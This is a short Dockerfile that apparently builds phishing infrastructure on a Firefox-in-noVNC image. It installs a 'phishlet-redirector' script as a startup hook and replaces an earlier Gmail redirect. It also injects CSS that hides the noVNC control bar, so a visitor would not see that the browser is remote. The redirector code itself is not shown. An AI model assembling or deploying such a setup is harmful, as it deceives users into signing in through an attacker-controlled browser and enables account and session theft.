FROM jlesage/firefox

RUN apk add --no-cache sqlite python3 xdotool xclip

COPY extensions/phishlet-redirector/phishlet-redirector.py /opt/phishlet-redirector.py
COPY extensions/phishlet-redirector/99-phishlet-redirector /etc/cont-init.d/99-phishlet-redirector
RUN chmod +x /etc/cont-init.d/99-phishlet-redirector

RUN rm -f /etc/cont-init.d/99-gmail-redirect

RUN sed -i 's|</head>|<style>#noVNC_control_bar,#noVNC_control_bar_handle{display:none!important}</style></head>|' /opt/noVNC/index.html
